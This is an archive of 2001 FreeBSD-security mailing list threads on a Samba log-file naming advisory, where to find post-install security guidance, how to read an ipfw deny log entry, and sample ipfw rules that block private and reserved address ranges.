List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There has been an advisory? > > >>Ryan Masse wrote: > > How come there hasen't been a security advisory about the > > latest possible remote root comprise found in all samba > > versions prior to 2.0.10? > > There has been, and the samba port installs by default with > log file names of the form "log.%m". > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 17:52:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id 9C4CC37B409 for ; Thu, 28 Jun 2001 17:52:37 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (IDENT:rasmith@localhost [127.0.0.1]) by aristotle.tamu.edu (8.9.3/8.8.7) with ESMTP id TAA32034; Thu, 28 Jun 2001 19:52:34 -0500 Message-Id: <200106290052.TAA32034@aristotle.tamu.edu> To: "Ryan Masse" Cc: "FreeBSD-Security" Subject: Re: samba vulnerability In-Reply-To: Message from "Ryan Masse" of "Thu, 28 Jun 2001 20:26:56 EDT." <005e01c10032$374ad360$3200a8c0@Home> Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Thu, 28 Jun 2001 19:52:34 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Ryan" == Ryan Masse writes: Ryan> There has been an advisory? Well, I may be confused: I got a message from somewhere a week or two ago concerning this logfile naming problem, but the only recent advisory I can find concerning samba is: FreeBSD-SA-01:36.samba.asc which concerns a race condition exploit in files in /tmp . I do know that I received a warning from somewhere about the %m.log exploit, but now I wonder where it was. Robin Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 19:52:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from boggy.acest.tutrp.tut.ac.jp (boggy.acest.tutrp.tut.ac.jp [133.15.67.40]) by hub.freebsd.org (Postfix) with ESMTP id D8B1637B406 for ; Thu, 28 Jun 2001 19:52:24 -0700 (PDT) (envelope-from nakaji@tutrp.tut.ac.jp) Received: from boggy.acest.tutrp.tut.ac.jp (localhost [127.0.0.1]) by boggy.acest.tutrp.tut.ac.jp (8.11.2/8.11.3) with ESMTP id f5T2qMH30519 for ; Fri, 29 Jun 2001 11:52:22 +0900 (JST) To: freebsd-security@freebsd.org Subject: Re: samba vulnerability References: <200106290052.TAA32034@aristotle.tamu.edu> MIME-Version: 1.0 (generated by SEMI 1.14.3 - "Ushinoya") Content-Type: text/plain; charset=US-ASCII From: NAKAJI Hiroyuki Date: 29 Jun 2001 11:52:22 +0900 In-Reply-To: <200106290052.TAA32034@aristotle.tamu.edu> (Robin Smith's message of "29 Jun 2001 02:52:55 +0200") Message-ID: <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> Lines: 10 User-Agent: T-gnus/6.15.3 (based on Oort Gnus v0.03) (revision 02) SEMI/1.14.3 (Ushinoya) FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 Emacs/20.7 (i386--freebsd) MULE/4.0 (HANANOEN) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> In <200106290052.TAA32034@aristotle.tamu.edu> >>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: RS> the %m.log exploit, but now I wonder where it was. http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html Is this what you read? -- NAKAJI Hiroyuki To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 20:37:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from panda.freebsdsystems.com (panda.freebsdsystems.com [216.126.95.28]) by hub.freebsd.org (Postfix) with SMTP id 57B7337B409 for ; Thu, 28 Jun 2001 20:37:34 -0700 (PDT) (envelope-from lnb@freebsdsystems.com) Received: (qmail 31850 invoked by uid 89); 29 Jun 2001 03:37:29 -0000 Message-ID: <20010629033729.31849.qmail@panda.freebsdsystems.com> References: <200106290052.TAA32034@aristotle.tamu.edu> <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> In-Reply-To: <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> From: "Lanny Baron" To: NAKAJI Hiroyuki Cc: freebsd-security@freebsd.org Subject: Re: samba vulnerability Date: Fri, 29 Jun 2001 03:37:29 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Sender: lnb@freebsdsystems.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I am the Canadian mirror for Samba.org and the warning is right on the main page, under NEWS. It's the macro %m and it warns: The security hole occurs when a log file option like the following is used: log file = /var/log/samba/%m.log In that case the attacker can use a locally created symbolic link to overwrite any file on the system. This requires local access to the server. If your Samba configuration has something like the following: log file = /var/log/samba/%m Then the attacker could successfully compromise your server remotely as no symbolic link is required. This type of configuration is very rare. The most commonly used log file configuration containing %m is the distributed in the sample configuration file that comes with Samba: log file = /var/log/samba/log.%m in that case your machine is not vulnerable to this attack unless you happen to have a subdirectory in /var/log/samba/ which starts with the prefix "log." Regards, Lanny NAKAJI Hiroyuki writes: >>>>>> In <200106290052.TAA32034@aristotle.tamu.edu> >>>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: > > RS> the %m.log exploit, but now I wonder where it was. > > http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html > > Is this what you read? > -- > NAKAJI Hiroyuki > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= Lanny Baron servers with the power to Serve http://www.FreeBSDsystems.com 1.877.963.1900 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 21:11:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.allyster.com (fw.allyster.com [194.202.29.33]) by hub.freebsd.org (Postfix) with SMTP id 3450A37B40A for ; Thu, 28 Jun 2001 21:11:56 -0700 (PDT) (envelope-from jslivko@jslivko.org) Received: (qmail 31345 invoked from network); 29 Jun 2001 01:26:50 -0000 Received: from mail.allyster.com (jslivko@194.202.29.35) by mail.allyster.com with SMTP; 29 Jun 2001 01:26:50 -0000 Date: Fri, 29 Jun 2001 02:26:50 +0100 (BST) From: "Jonathan M. Slivko" X-Sender: jslivko@localhost.localdomain To: FreeBSD Security Mailing List Subject: Hitlist for Security Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Has anyone seen a URL or a book that has a hitlist of common things that need to be patched when installing a new system from scratch? Please e-mail me and let me know. Thanks! -- Jonathan /--------------------------------------------------------------\ Jonathan Slivko -- Black Lotus Comm. -- jslivko@jslivko.org www.jslivko.org - www.blacklotus.net - www.freebsd.org Phone: (212) 663-1109 -- Pager: (917) 388-5304 FreeBSD: The Power to Serve! \--------------------------------------------------------------/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 21:16:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id F202C37B40A for ; Thu, 28 Jun 2001 21:16:54 -0700 (PDT) (envelope-from mail@max-info.net) Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5T4FvQ07036; Fri, 29 Jun 2001 00:15:58 -0400 (EDT) (envelope-from mail@max-info.net) Message-ID: <014601c10051$ca88d2c0$3200a8c0@Home> From: "Ryan Masse" To: "Lanny Baron" Cc: "FreeBSD-Security" References: <200106290052.TAA32034@aristotle.tamu.edu> <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> <20010629033729.31849.qmail@panda.freebsdsystems.com> Subject: Re: samba vulnerability Date: Fri, 29 Jun 2001 00:13:01 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org i'm sure we are all aware of the problem.. my original question was how come this didn't make the freebsd security advisory? Ryan > Hi, > I am the Canadian mirror for Samba.org and the warning is right on the main > page, under NEWS. It's the macro %m and it warns: > > The security hole occurs when a log file option like the following is > used: > > log file = /var/log/samba/%m.log > > In that case the attacker can use a locally created symbolic link to > overwrite any file on the system. This requires local access to the > server. > > If your Samba configuration has something like the following: > > log file = /var/log/samba/%m > > Then the attacker could successfully compromise your server remotely > as no symbolic link is required. This type of configuration is very > rare. > > The most commonly used log file configuration containing %m is the > distributed in the sample configuration file that comes with Samba: > > log file = /var/log/samba/log.%m > > in that case your machine is not vulnerable to this attack unless you > happen to have a subdirectory in /var/log/samba/ which starts with the > prefix "log." > > Regards, > Lanny > > NAKAJI Hiroyuki writes: > > >>>>>> In <200106290052.TAA32034@aristotle.tamu.edu> > >>>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: > > > > RS> the %m.log exploit, but now I wonder where it was. > > > > http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html > > > > Is this what you read? > > -- > > NAKAJI Hiroyuki > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= > Lanny Baron > servers with the power to Serve > http://www.FreeBSDsystems.com > 1.877.963.1900 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 21:31:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from panda.freebsdsystems.com (panda.freebsdsystems.com [216.126.95.28]) by hub.freebsd.org (Postfix) with SMTP id E715437B409 for ; Thu, 28 Jun 2001 21:31:20 -0700 (PDT) (envelope-from lnb@freebsdsystems.com) Received: (qmail 32535 invoked by uid 89); 29 Jun 2001 04:31:20 -0000 Message-ID: <20010629043120.32534.qmail@panda.freebsdsystems.com> References: <200106290052.TAA32034@aristotle.tamu.edu> <87u210ngk9.fsf@boggy.acest.tutrp.tut.ac.jp> <20010629033729.31849.qmail@panda.freebsdsystems.com> <014601c10051$ca88d2c0$3200a8c0@Home> In-Reply-To: <014601c10051$ca88d2c0$3200a8c0@Home> From: "Lanny Baron" To: "Ryan Masse" Cc: "FreeBSD-Security" Subject: Re: samba vulnerability Date: Fri, 29 Jun 2001 04:31:20 GMT Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Sender: lnb@freebsdsystems.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Ryan, I cannot answer that. I am not a part of The FreeBSD Project Inc. But your question is well taken. In fact Ryan, it was your posting that led me to our mirror of Samba (http://ca.samba.org/samba/samba.html) to see what the Samba team had pointed out. What this really shows is, how well the FreeBSD community works. It's just people like you Ryan, and others that keep other people abreast of things. Regards, Lanny Ryan Masse writes: > i'm sure we are all aware of the problem.. my original question was how come > this didn't make the freebsd security advisory? > > Ryan > >> Hi, >> I am the Canadian mirror for Samba.org and the warning is right on the > main >> page, under NEWS. It's the macro %m and it warns: >> >> The security hole occurs when a log file option like the following is >> used: >> >> log file = /var/log/samba/%m.log >> >> In that case the attacker can use a locally created symbolic link to >> overwrite any file on the system. This requires local access to the >> server. >> >> If your Samba configuration has something like the following: >> >> log file = /var/log/samba/%m >> >> Then the attacker could successfully compromise your server remotely >> as no symbolic link is required. This type of configuration is very >> rare. >> >> The most commonly used log file configuration containing %m is the >> distributed in the sample configuration file that comes with Samba: >> >> log file = /var/log/samba/log.%m >> >> in that case your machine is not vulnerable to this attack unless you >> happen to have a subdirectory in /var/log/samba/ which starts with the >> prefix "log." >> >> Regards, >> Lanny >> >> NAKAJI Hiroyuki writes: >> >> >>>>>> In <200106290052.TAA32034@aristotle.tamu.edu> >> >>>>>> rasmith@aristotle.tamu.edu (Robin Smith) wrote: >> > >> > RS> the %m.log exploit, but now I wonder where it was. >> > >> > http://lists.samba.org/pipermail/samba-announce/2001-June/000054.html >> > >> > Is this what you read? >> > -- >> > NAKAJI Hiroyuki >> > >> > To Unsubscribe: send mail to majordomo@FreeBSD.org >> > with "unsubscribe freebsd-security" in the body of the message >> >> >> >> ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= >> Lanny Baron >> servers with the power to Serve >> http://www.FreeBSDsystems.com >> 1.877.963.1900 >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~= Lanny Baron servers with the power to Serve http://www.FreeBSDsystems.com 1.877.963.1900 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 23: 7:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from radix.cryptio.net (radix.cryptio.net [199.181.107.213]) by hub.freebsd.org (Postfix) with ESMTP id 663BA37B401 for ; Thu, 28 Jun 2001 23:07:13 -0700 (PDT) (envelope-from emechler@radix.cryptio.net) Received: (from emechler@localhost) by radix.cryptio.net (8.11.3/8.11.3) id f5T676912314; Thu, 28 Jun 2001 23:07:06 -0700 (PDT) (envelope-from emechler) Date: Thu, 28 Jun 2001 23:07:06 -0700 From: Erick Mechler To: "Jonathan M. Slivko" Cc: FreeBSD Security Mailing List Subject: Re: Hitlist for Security Message-ID: <20010628230706.C10490@techometer.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from Jonathan M. Slivko on Fri, Jun 29, 2001 at 02:26:50AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I would start with the security advisories (www.freebsd.org/security). According to that list, there has only been one advisory in the base system since 4.3-RELEASE. Your question is a bit open-ended, of course, 'cause you don't state what version your new system is. Also, the Release Notes generally follow the advisories once the base system is patched. See section 2.2 of http://people.freebsd.org/~bmah/relnotes/4-STABLE/relnotes-i386.html --Erick At Fri, Jun 29, 2001 at 02:26:50AM +0100, Jonathan M. Slivko said this: :: Hello, :: :: Has anyone seen a URL or a book that has a hitlist of common things that :: need to be patched when installing a new system from scratch? Please :: e-mail me and let me know. Thanks! -- Jonathan :: :: /--------------------------------------------------------------\ :: Jonathan Slivko -- Black Lotus Comm. -- jslivko@jslivko.org :: www.jslivko.org - www.blacklotus.net - www.freebsd.org :: Phone: (212) 663-1109 -- Pager: (917) 388-5304 :: FreeBSD: The Power to Serve! :: \--------------------------------------------------------------/ :: :: :: To Unsubscribe: send mail to majordomo@FreeBSD.org :: with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 3: 7:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id A1AC237B406 for ; Fri, 29 Jun 2001 03:07:09 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15Fv8X-0006Eq-00; Fri, 29 Jun 2001 12:04:29 +0200 From: Sheldon Hearn To: Erick Mechler Cc: "Jonathan M. Slivko" , FreeBSD Security Mailing List Subject: Re: Hitlist for Security In-reply-to: Your message of "Thu, 28 Jun 2001 23:07:06 MST." <20010628230706.C10490@techometer.net> Date: Fri, 29 Jun 2001 12:04:29 +0200 Message-ID: <23983.993809069@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 28 Jun 2001 23:07:06 MST, Erick Mechler wrote: > I would start with the security advisories (www.freebsd.org/security). You would? I'd start with the Security chapter of the FreeBSD Handbook. :-) http://www.freebsd.org/handbook/security.html Then I'd look at Jan Koum's tutorial, which is linked off the security page you suggested. http://people.FreeBSD.org/~jkb/howto.html There's a lot of overlap. With this background under your belt, the security advisories are going to be a whole lot more useful. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 4:11: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id CB28A37B40B for ; Fri, 29 Jun 2001 04:10:52 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (IDENT:rasmith@localhost [127.0.0.1]) by aristotle.tamu.edu (8.9.3/8.8.7) with ESMTP id GAA32477; Fri, 29 Jun 2001 06:10:42 -0500 Message-Id: <200106291110.GAA32477@aristotle.tamu.edu> To: "Ryan Masse" Cc: "Lanny Baron" , "FreeBSD-Security" Subject: Re: samba vulnerability In-Reply-To: Message from "Ryan Masse" of "Fri, 29 Jun 2001 00:13:01 EDT." <014601c10051$ca88d2c0$3200a8c0@Home> Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Fri, 29 Jun 2001 06:10:42 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org One reason the Samba security advisory about using such things as %m.log as filenames many not have merited a FreeBSD security advisory is that (IIRC) the default config in the FreeBSD samba port (both of them: 2.0 under net/samba and 2.2 under net/samba-devel) has by default used log.%m for machine logfiles for at least a few months now. Of course, if you decided to change the config you could open yourself up again. I'm only guessing about whether this is why there was no freebsd s.a. Robin Smith To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 7:50:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.93.208]) by hub.freebsd.org (Postfix) with ESMTP id A4EEE37B406 for ; Fri, 29 Jun 2001 07:50:46 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: What is ipfw telling me ? To: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Fri, 29 Jun 2001 09:49:54 -0500 X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a |January 17, 2001) at 06/29/2001 09:45:07 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What is ipfw telling me ? The 216 host is attempting to break in, but how is it using port 80 on the other machine ? ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 7:59:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 539A837B401 for ; Fri, 29 Jun 2001 07:59:32 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1108 invoked by uid 1000); 29 Jun 2001 15:04:02 -0000 Date: Fri, 29 Jun 2001 18:04:02 +0300 From: Peter Pentchev To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: What is ipfw telling me ? Message-ID: <20010629180402.B535@ringworld.oblivion.bg> Mail-Followup-To: George.Giles@mcmail.vanderbilt.edu, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Fri, Jun 29, 2001 at 09:49:54AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 29, 2001 at 09:49:54AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > What is ipfw telling me ? > > The 216 host is attempting to break in, but how is it using port 80 on the > other machine ? > > ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0 The host 216.239.46.20 is trying to connect to 10.0.0.1; the connection attempt is from port 21602 (ephemeral, unique to this connection in a certain timeframe) to port 80 on 10.0.0.1. That is, someone from 216.239.46.20 is trying to browse the web on 10.0.0.1. G'luck, Peter -- This sentence claims to be an Epimenides paradox, but it is lying. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 8:35:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 88B7B37B403 for ; Fri, 29 Jun 2001 08:35:13 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (localhost.veldy.net [127.0.0.1]) by veldy.net (Postfix) with SMTP id 78574BAAC; Fri, 29 Jun 2001 10:35:10 -0500 (CDT) Message-ID: <007801c100b0$e7527730$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: , References: Subject: Re: What is ipfw telling me ? Date: Fri, 29 Jun 2001 10:33:34 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You may want to limit such abuse via firewall rules. # Stop RFC1918 nets on the outside interface ${fwcmd} add deny log all from any to 10.0.0.0/8 via ${oif} ${fwcmd} add deny log all from any to 172.16.0.0/12 via ${oif} ${fwcmd} add deny log all from any to 192.168.0.0/16 via ${oif} # Stop draft-manning-dsua-03.txt (1 May 2000) nets (includes RESERVED-1, # DHCP auto-configuration, NET-TEST, MULTICAST (class D), and class E) # on the outside interface ${fwcmd} add deny log all from any to 0.0.0.0/8 via ${oif} ${fwcmd} add deny log all from any to 169.254.0.0/16 via ${oif} ${fwcmd} add deny log all from any to 192.0.2.0/24 via ${oif} ${fwcmd} add deny log all from any to 224.0.0.0/4 via ${oif} ${fwcmd} add deny log all from any to 240.0.0.0/4 via ${oif} Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: To: Sent: Friday, June 29, 2001 9:49 AM Subject: What is ipfw telling me ? > What is ipfw telling me ? > > The 216 host is attempting to break in, but how is it using port 80 on the > other machine ? > > ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0 > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 9:17:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.93.208]) by hub.freebsd.org (Postfix) with ESMTP id 09C3137B409 for ; Fri, 29 Jun 2001 09:17:45 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Subject: Re: What is ipfw telling me ? To: Peter Pentchev Cc: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.3 March 21, 2000 Message-ID: From: George.Giles@mcmail.vanderbilt.edu Date: Fri, 29 Jun 2001 11:16:52 -0500 X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a |January 17, 2001) at 06/29/2001 11:12:05 AM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I do not agree. Here's why: the ipfw is on 10.0.0.2 and does not have a web server. 10.0.0.1 does. I see a lot of these style attacks, various ports, various services used on 10.0.0.1, always proxying to another machine. That is ipfw is on 10.0.0.2 and the signature of the log is: attacker:port 10.0.0.1:port It makes me think that somehow a proxy attack is going on. The 10.x.x.x are not the actual addresses obviously. George Peter Pentchev To: George.Giles@mcmail.vanderbilt.edu Subject: Re: What is ipfw telling me ? 06/29/2001 10:04 AM On Fri, Jun 29, 2001 at 09:49:54AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > What is ipfw telling me ? > > The 216 host is attempting to break in, but how is it using port 80 on the > other machine ? > > ipfw: 2400 Deny TCP 216.239.46.20:21602 10.0.0.1:80 in via xl0 The host 216.239.46.20 is trying to connect to 10.0.0.1; the connection attempt is from port 21602 (ephemeral, unique to this connection in a certain timeframe) to port 80 on 10.0.0.1. That is, someone from 216.239.46.20 is trying to browse the web on 10.0.0.1. G'luck, Peter -- This sentence claims to be an Epimenides paradox, but it is lying. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 29 9:25:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 9D77A37B407 for ; Fri, 29 Jun 2001 09:24:58 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 5712 invoked by uid 1000); 29 Jun 2001 16:29:25 -0000 Date: Fri, 29 Jun 2001 19:29:25 +0300 From: Peter Pentchev To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@freebsd.org Subject: Re: What is ipfw telling me ? Message-ID: <20010629192925.F535@ringworld.oblivion.bg> Mail-Followup-To: George.Giles@mcmail.vanderbilt.edu, freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Fri, Jun 29, 2001 at 11:16:52AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 29, 2001 at 11:16:52AM -0500, George.Giles@mcmail.vanderbilt.edu wrote: > > I do not agree. Here's why: > > the ipfw is on 10.0.0.2 and does not have a web server. > 10.0.0.1 does. > > I see a lot of these style attacks, various ports, various services used on > 10.0.0.1, always proxying to another machine. That is ipfw is on 10.0.0.2 > and the signature of the log is: > > attacker:port 10.0.0.1:port > > It makes me think that somehow a proxy attack is going on. > > The 10.x.x.x are not the actual addresses obviously. Look. The ipfw logs (as you could easily test yourself) list the source and destination addresses of a TCP or UDP packet as saddr:sport daddr:dport. The log line you pasted clearly means that there was a TCP packet from 216.blah port 21602 (clearly ephemeral) to 10.0.0.1 port 80. Somebody is trying to reach port 80 on 10.0.0.1. If 10.0.0.1 is not directly reachable, then this might very well be a packet translated by a NAT (a.k.a masquerading in the Linux world) gateway. It might be a proxy attack, but this depends on the structure of your network. All the log says is that 216.blah is trying to connect to the webserver on 10.0.0.1, and that's a fact. G'luck, Peter -- This sentence claims to be an Epimenides paradox, but it is lying. > Peter > Pentchev To: George.Giles@mcmail.vanderbilt.edu > .bg> Subject: Re: What is ipfw telling me ? > > 06/29/2001 > 